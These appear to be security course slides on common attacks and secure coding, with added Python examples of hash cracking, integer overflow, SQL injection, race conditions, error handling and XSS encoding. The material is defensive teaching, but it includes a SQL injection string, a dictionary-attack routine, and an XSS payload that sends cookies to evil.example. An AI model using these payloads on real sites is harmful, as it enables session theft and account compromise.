2. Introduction
• Comparing common attacks
• Summarizing secure coding concepts
• Identifying application attacks
• Understanding frameworks and guides
3. Common Attacks
• Denial-of-service (DoS)
– Comes from one system
• Distributed denial-of-service (DDoS)
– Multiple attacking computers (often a botnet)
– Typically includes sustained, abnormally high network traffic
4. Common Attacks
• Privilege escalation
– Gain additional privileges after the initial exploit
• Spoofing
– Impersonating or masquerading as someone or something else
– MAC spoofing
– IP spoofing
5. Common Attacks
• SYN flood attack
– Common attack against Internet servers
– Disrupts the TCP three-way handshake
– Withholds the third packet (the final ACK), leaving half-open connections that tie up server resources
7. Password Attacks
• Online password attack
– Attempts to discover a password by submitting guesses to a live system
– Bounded by rate limiting and account lockout
• Offline password attack
– Attempts to discover passwords from a captured database or captured packet scan
– Guesses are unlimited, so the strength of the stored hash decides the outcome
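The two attack types on this slide, worked through in Python as an added example (not code from the course): an offline dictionary attack against a constructed leak of unsalted SHA-256 hashes, the same attack against salted PBKDF2 hashes, and an online login with lockout. The usernames, passwords, word list and the LoginService class are all constructed for this illustration.

```python
import hashlib
import secrets

# Constructed sample data for this example: a leaked table of unsalted
# SHA-256 password hashes (usernames and passwords are made up).
LEAKED_HASHES = {
    "alice": hashlib.sha256(b"Summer2023").hexdigest(),
    "bob": hashlib.sha256(b"letmein").hexdigest(),
    "carol": hashlib.sha256(b"correct horse battery staple").hexdigest(),
}

# A tiny constructed word list; real attacks use millions of entries.
WORDLIST = ["password", "123456", "letmein", "Summer2023", "qwerty"]


def offline_attack_unsalted(hash_db, wordlist):
    """Offline dictionary attack on unsalted hashes.

    One hash per candidate word tests it against every account at once,
    so the cost does not grow with the number of users.
    """
    candidates = {hashlib.sha256(w.encode()).hexdigest(): w for w in wordlist}
    return {user: candidates[h] for user, h in hash_db.items() if h in candidates}


def hash_password(password, iterations=600_000, salt=None):
    """Defender side: salted, iterated PBKDF2-HMAC-SHA256 stored as salt$hash."""
    salt = secrets.token_bytes(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored, iterations=600_000):
    """Recompute the hash with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), iterations)
    return secrets.compare_digest(digest.hex(), digest_hex)


def offline_attack_salted(stored_db, wordlist, iterations=600_000):
    """Same dictionary attack against salted, iterated hashes: every
    (user, word) pair needs its own slow PBKDF2 run. Returns the cracked
    accounts and the number of hash computations that took."""
    cracked, computed = {}, 0
    for user, stored in stored_db.items():
        for word in wordlist:
            computed += 1
            if verify_password(word, stored, iterations):
                cracked[user] = word
                break
    return cracked, computed


class LoginService:
    """Online side: every guess goes through the server, which can lock the
    account. An online attack is bounded by this policy; an offline one is not."""

    def __init__(self, stored_db, max_failures=5, iterations=600_000):
        self.db, self.max_failures, self.iterations = stored_db, max_failures, iterations
        self.failures = {}

    def login(self, user, password):
        if self.failures.get(user, 0) >= self.max_failures:
            return "locked"
        if user in self.db and verify_password(password, self.db[user], self.iterations):
            self.failures[user] = 0
            return "ok"
        self.failures[user] = self.failures.get(user, 0) + 1
        return "denied"


if __name__ == "__main__":
    print("unsalted:", offline_attack_unsalted(LEAKED_HASHES, WORDLIST))
    salted_db = {u: hash_password(p, iterations=1000)
                 for u, p in [("alice", "Summer2023"), ("bob", "letmein")]}
    print("salted:", offline_attack_salted(salted_db, WORDLIST, iterations=1000))
```

Against the unsalted leak, five hash computations test five words against all three accounts; against the salted store the same word list costs one slow PBKDF2 run per (account, word) pair, which is the point of salting and iterating. The iteration count of 1000 used in the demo is only to keep it fast; the default of 600,000 is a realistic production setting.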
9. Common Attacks
• Known plaintext
– Attacker has samples of both the plaintext and the ciphertext
• Compare with chosen plaintext
– Attacker picks the plaintext and obtains its ciphertext
10. Common Attacks
• Typo squatting / URL hijacking
– Attackers purchase similar domain names for various malicious purposes
– Users visit the typo squatting domain when they enter the URL incorrectly with a common typo
• Clickjacking
– Tricks users into clicking something different from what they see
– Typically uses frames (a transparent frame of the target site placed over a decoy page)
– Mitigated by forbidding framing (X-Frame-Options or the CSP frame-ancestors directive)
11. Common Attacks
• Session hijacking
– Impersonate the user with the session ID
– Session IDs stored in cookies
– Protect the cookie with TLS and the Secure, HttpOnly and SameSite flags
• Domain hijacking
– Attacker changes the registration of the domain name
– Typically done through social engineering or by guessing the owner’s registrar password
12. Common Attacks
• Zero-day vulnerabilities
– Undocumented and unknown to the public
– Vendor might know about it, but has not yet released a patch to address it
• Zero-day attack
– Attempts to exploit zero-day vulnerabilities
– Also known as a zero-day exploit
13. Memory Buffer Vulnerabilities
Application bugs
• Memory leak
– App consumes more and more memory without releasing it
– Can exhaust memory and crash the application or the operating system
• Integer overflow
– App attempts to use or create a numeric value too big for the available storage
– 8-bit storage holds 0 to 255
– 95 x 59 = 5,605 (needs at least 13 bits to store); in 8 bits it silently wraps to 229
14. Memory Buffer Vulnerabilities
• Buffer overflow and buffer overflow attack
– Occur when an application receives more data than the buffer can hold
– Overwrites adjacent memory (other variables, saved return addresses)
– Often includes NOP instructions (such as 0x90) as a NOP sled
– Can then insert malicious code into memory and redirect execution to it
– Input validation (length checks) helps prevent buffer overflow attacks
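An added example (not course material) that ties the two memory slides together in Python: it models fixed-width unsigned arithmetic with a `wrap` helper, shows a length check that passes because the product 95 x 59 wraps in 8 bits while the copy still writes 5,605 bytes, and the hardened check that validates the operands before multiplying. The function names and the `simulate_copy` buffer model are constructed for this illustration; Python integers do not overflow on their own, which is why the width is simulated.

```python
def wrap(value, bits):
    """Truncate an unbounded Python int to an unsigned fixed-width value,
    the way a CPU register or a C unsigned type silently would."""
    return value & ((1 << bits) - 1)


def plan_copy_vulnerable(record_count, record_size, buffer_size, bits=8):
    """Length check performed on the truncated product.

    The check can pass while the real amount of data that will be copied,
    record_count * record_size bytes, is far larger than the buffer: an
    integer overflow that becomes a buffer overflow.
    """
    checked = wrap(record_count * record_size, bits)
    if checked > buffer_size:
        raise ValueError("rejected: %d bytes exceeds buffer of %d" % (checked, buffer_size))
    actual = record_count * record_size  # what the copy loop really writes
    return {"checked_length": checked, "bytes_written": actual,
            "overflowed": actual > buffer_size}


def plan_copy_safe(record_count, record_size, buffer_size, bits=8):
    """Validate the operands before multiplying so the product cannot wrap,
    then check the true total against the buffer."""
    max_value = (1 << bits) - 1
    if record_size <= 0 or record_count < 0:
        raise ValueError("rejected: invalid sizes")
    if record_count > max_value // record_size:
        raise ValueError("rejected: %d x %d would overflow %d bits"
                         % (record_count, record_size, bits))
    total = record_count * record_size
    if total > buffer_size:
        raise ValueError("rejected: %d bytes exceeds buffer of %d" % (total, buffer_size))
    return {"checked_length": total, "bytes_written": total, "overflowed": False}


def simulate_copy(buffer_size, data):
    """Model a fixed-size buffer: bytes past its end spill into 'adjacent'
    memory, which is how an overflow corrupts neighbouring data."""
    buffer = bytearray(buffer_size)
    buffer[:min(len(data), buffer_size)] = data[:buffer_size]
    adjacent = bytes(data[buffer_size:])
    return bytes(buffer), adjacent


def rejected(fn, *args):
    """True if fn(*args) refuses the input with ValueError."""
    try:
        fn(*args)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    # The slide's numbers: 95 records of 59 bytes = 5,605 bytes (13 bits needed).
    print(plan_copy_vulnerable(95, 59, 256))  # check sees 229, copy writes 5,605
    print("safe check rejects 95 x 59:", rejected(plan_copy_safe, 95, 59, 256))
    print(simulate_copy(4, b"ABCDEFG"))        # b'ABCD' in the buffer, b'EFG' spilled
```

The vulnerable version is the pattern behind many real allocation-size bugs: `count * size` is computed in a fixed width, compared, and then used to drive a loop that trusts the original operands. Checking `record_count <= max_value // record_size` before the multiplication is the standard fix because it cannot itself overflow.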
15. Secure Coding Concepts
• Compiled code
– Optimized
– Run as an executable
– Compiler checks the program for errors and
• Runtime code
– Code is evaluated, interpreted, and executed when the code is run
– HTML is interpreted by web browsers and displayed as web pages
16. Input Validation
• Verifies validity of data before using it
– Verifies proper characters (allow-list)
– Uses boundary and/or range checking
– Blocks HTML code
– Prevents the use of certain characters
• Client-side vs server-side
– Server-side is more secure, because client-side checks can be bypassed by any client that is not the browser (many sites use both)
• Input validation helps prevent
– Buffer overflow, SQL injection, command injection, and cross-site scripting attacks
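Server-side input validation and its effect on SQL injection, as an added Python example that is not part of the course: an allow-list regex with length bounds, a range check, a string-built query that the classic `' OR '1'='1` payload turns into "return every row", and the parameterised query that treats the same input as plain data. The table, rows and function names are constructed for this illustration.

```python
import re
import sqlite3

# Allow-list: only letters, digits and underscore, 3 to 32 characters.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,32}")


def validate_username(value):
    """Character allow-list plus length bounds; anything else is rejected."""
    if not isinstance(value, str) or not USERNAME_RE.fullmatch(value):
        raise ValueError("invalid username")
    return value


def validate_quantity(value, low=1, high=100):
    """Range (boundary) check on a numeric field."""
    try:
        qty = int(value)
    except (TypeError, ValueError):
        raise ValueError("quantity must be an integer")
    if not low <= qty <= high:
        raise ValueError("quantity must be between %d and %d" % (low, high))
    return qty


def make_db():
    """Constructed in-memory table standing in for a real user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "user"), ("bob", "admin")])
    return conn


def lookup_vulnerable(conn, name):
    """No validation and string-built SQL: the input becomes part of the query."""
    return conn.execute(
        "SELECT name, role FROM users WHERE name = '%s'" % name).fetchall()


def lookup_safe(conn, name):
    """Validate first, then bind the value as a parameter so it can only ever
    be data, never SQL syntax."""
    name = validate_username(name)
    return conn.execute(
        "SELECT name, role FROM users WHERE name = ?", (name,)).fetchall()


def rejected(fn, *args):
    """True if fn(*args) refuses the input with ValueError."""
    try:
        fn(*args)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    conn = make_db()
    payload = "x' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(conn, payload))  # returns every row
    print("safe rejects payload:", rejected(lookup_safe, conn, payload))
    print("safe normal lookup:", lookup_safe(conn, "alice"))
```

Note that the parameterised query alone would already stop the injection; the allow-list is a second, independent layer that also keeps oversized or odd input out of the application. Validation narrows what reaches the code, parameter binding makes the remaining input harmless to the interpreter, and the two are not substitutes for each other.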
17. Secure Coding Concepts
• Avoid race conditions
– Occur when two threads or processes access the same resource at the same time and the result depends on their timing
– First module to complete the process wins
– Locks (for example database locks) serialize access and prevent race conditions
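A race condition and the lock that removes it, as an added Python example rather than course code. Five threads each try to withdraw 60 from an account holding 100; the unlocked check-then-act lets several of them pass the balance check against the same stale value, while the locked version lets exactly one through. The `Account` class and the deliberate `sleep` that widens the race window are constructed for this illustration.

```python
import threading
import time


class Account:
    """Shared resource: a balance that several threads try to withdraw from."""

    def __init__(self, balance):
        self.balance = balance
        self.lock = threading.Lock()

    def withdraw_racy(self, amount):
        # Check-then-act with no lock. Several threads can pass the check
        # against the same old balance; the last write wins and the others
        # are lost, so more money leaves than the account held.
        if self.balance >= amount:
            current = self.balance
            time.sleep(0.01)  # widen the window so the race shows up reliably
            self.balance = current - amount
            return True
        return False

    def withdraw_locked(self, amount):
        # The lock serialises check and update, like a row lock in a database.
        with self.lock:
            if self.balance >= amount:
                current = self.balance
                time.sleep(0.01)
                self.balance = current - amount
                return True
            return False


def run_withdrawals(method, start_balance, amount, thread_count):
    """Run thread_count concurrent withdrawals; return (final balance, successes)."""
    account = Account(start_balance)
    results = []
    results_lock = threading.Lock()

    def worker():
        ok = method(account, amount)
        with results_lock:
            results.append(ok)

    threads = [threading.Thread(target=worker) for _ in range(thread_count)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return account.balance, sum(results)


if __name__ == "__main__":
    # 100 in the account, five threads each try to take 60: only one should succeed.
    print("racy:  ", run_withdrawals(Account.withdraw_racy, 100, 60, 5))
    print("locked:", run_withdrawals(Account.withdraw_locked, 100, 60, 5))
```

In the racy run the usual outcome is a balance of 40 with all five withdrawals reporting success, i.e. 300 paid out of an account that held 100; the exact count depends on scheduling, which is what makes races hard to reproduce in testing. The locked run always ends at 40 with one success. In a database the equivalent is performing the read and the update inside one transaction with a row lock (for example `SELECT ... FOR UPDATE`) rather than reading, deciding in application code, and writing back.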
18. Error and Exception Handling
• Catch errors and provide feedback
– Prevent improper input from crashing an application or providing information to attackers
– Errors to users should be general
– Logged information should be detailed
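The split between a general message to the user and a detailed log entry, as an added Python example (not course code). A leaky handler returns the raw exception text and traceback to the client; the hardened handler returns a fixed message plus a reference id and writes the detail, keyed on the same id, to the log. The `ORDERS` table, the in-memory log handler and the function names are constructed for this illustration.

```python
import logging
import traceback
import uuid


class ListHandler(logging.Handler):
    """Collects formatted log lines in memory so the example can compare what
    was logged with what was returned to the user."""

    def __init__(self):
        super().__init__()
        self.lines = []

    def emit(self, record):
        self.lines.append(self.format(record))


logger = logging.getLogger("orders")
logger.setLevel(logging.DEBUG)
log_sink = ListHandler()
logger.addHandler(log_sink)

# Constructed sample data standing in for a database.
ORDERS = {1001: {"item": "widget", "qty": 2}}


def get_order_leaky(order_id_raw):
    """Anti-pattern: the exception text and traceback go back to the client,
    revealing code paths, file names and sometimes data."""
    try:
        return 200, {"order": ORDERS[int(order_id_raw)]}
    except Exception as exc:
        return 500, {"error": str(exc), "trace": traceback.format_exc()}


def get_order(order_id_raw):
    """General message to the user, detailed record to the log, joined by a
    reference id so support can find the entry without exposing it."""
    ref = uuid.uuid4().hex[:8]
    try:
        order_id = int(order_id_raw)
    except (TypeError, ValueError):
        logger.warning("ref=%s rejected input=%r", ref, order_id_raw)
        return 400, {"error": "Invalid order id", "ref": ref}
    try:
        return 200, {"order": ORDERS[order_id]}
    except KeyError:
        logger.info("ref=%s order %d not found", ref, order_id)
        return 404, {"error": "Order not found", "ref": ref}
    except Exception:
        logger.error("ref=%s unhandled error\n%s", ref, traceback.format_exc())
        return 500, {"error": "Internal error", "ref": ref}


if __name__ == "__main__":
    print(get_order_leaky("12abc"))   # client sees 'invalid literal ...' and a traceback
    print(get_order("12abc"))         # client sees only 'Invalid order id' and a ref
    print(log_sink.lines[-1])         # the log has the ref and the offending input
```

The catch-all `except Exception` branch is deliberately last: it keeps an unexpected failure from crashing the request while still recording the full traceback server-side. Logging the raw input at warning level is appropriate for an order id; for fields that may carry credentials or personal data the log line should be redacted too.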
20. Secure Coding Concepts
• Code reuse
– Avoid dead code
• Software development kits (SDKs)
– Provide software tools that are easy to reuse
• Code obfuscation
– Camouflage code
21. Code Quality and Testing
• Static code analyzers
• Dynamic analysis
• Stress testing
• Sandboxing
• Model verification
22. SDLC Models
Software development life cycle (SDLC) models
• Waterfall
– Multiple stages going from top to bottom
– Strict
• Agile
– Starts with a set of principles
– Uses iterative cycles with incremental changes
– Flexible
24. Secure Coding Concepts
• Change management
– Ensures developers do not make unauthorized changes
– Provides an accounting structure
• Version control
– Tracks software versions
– Identifies who made the change and when
25. Secure Coding Concepts
• Provisioning (an application)
– Preparing to deploy it
– Configuring for different applications
• Deprovisioning (an application)
– Removing it completely
27. Application Attacks
• Cross-site scripting (XSS)
– Attackers embed malicious HTML or JavaScript code
– Can be in a web site or in links in email
– Prevented with server-side input validation and output encoding
– OWASP recommends using a well-tested encoding library rather than hand-written filters
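Output encoding against XSS, as an added Python example that is not part of the course: a reflected greeting that returns a constructed script payload verbatim, the same output encoded with the standard library's `html.escape`, and two cases input validation alone misses, attribute context (quotes must be encoded and the attribute quoted) and URL context (a `javascript:` URL is harmless text to an encoder, so the scheme has to be allow-listed). The payload and the function names are constructed for this illustration.

```python
import html
from urllib.parse import urlparse

# Constructed attacker input as it might arrive in a query string or form field.
PAYLOAD = "<script>document.location='http://evil.example/?c='+document.cookie</script>"


def greeting_vulnerable(name):
    """Reflects user input straight into the page: the browser runs the script."""
    return "<p>Hello, %s</p>" % name


def greeting_safe(name):
    """HTML-body context: encode < > & " ' so the input is displayed as text
    and never parsed as markup."""
    return "<p>Hello, %s</p>" % html.escape(name, quote=True)


def attribute_safe(value):
    """Attribute context: the attribute must be quoted and quotes in the value
    encoded, otherwise a '" onfocus="...' payload adds an event handler."""
    return '<input type="text" name="q" value="%s">' % html.escape(value, quote=True)


def link_safe(url):
    """URL context: encoding is not enough because javascript:alert(1) contains
    nothing to encode. Only an allow-list of schemes keeps script out of href."""
    scheme = urlparse(url).scheme.lower()
    if scheme not in ("http", "https"):
        raise ValueError("unsupported URL scheme")
    return '<a href="%s">link</a>' % html.escape(url, quote=True)


def rejected(fn, *args):
    """True if fn(*args) refuses the input with ValueError."""
    try:
        fn(*args)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print(greeting_vulnerable(PAYLOAD))
    print(greeting_safe(PAYLOAD))
    print(attribute_safe('" onfocus="alert(1)'))
    print("javascript: URL rejected:", rejected(link_safe, "javascript:alert(1)"))
```

`html.escape` is the right tool for HTML body and quoted-attribute contexts; template engines that auto-escape apply the same encoding by default. It is not a general sanitiser: the correct encoding depends on where the value lands (body, attribute, URL, JavaScript string, CSS), which is why the slide's advice to rely on a maintained library rather than a home-grown filter matters.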
28. Frameworks and Guides
• Frameworks
– Regulatory
– Non-regulatory
– National versus international
– Industry-specific
• Guides
– Vendor-specific
– Platform-specific
– Role- or goal-specific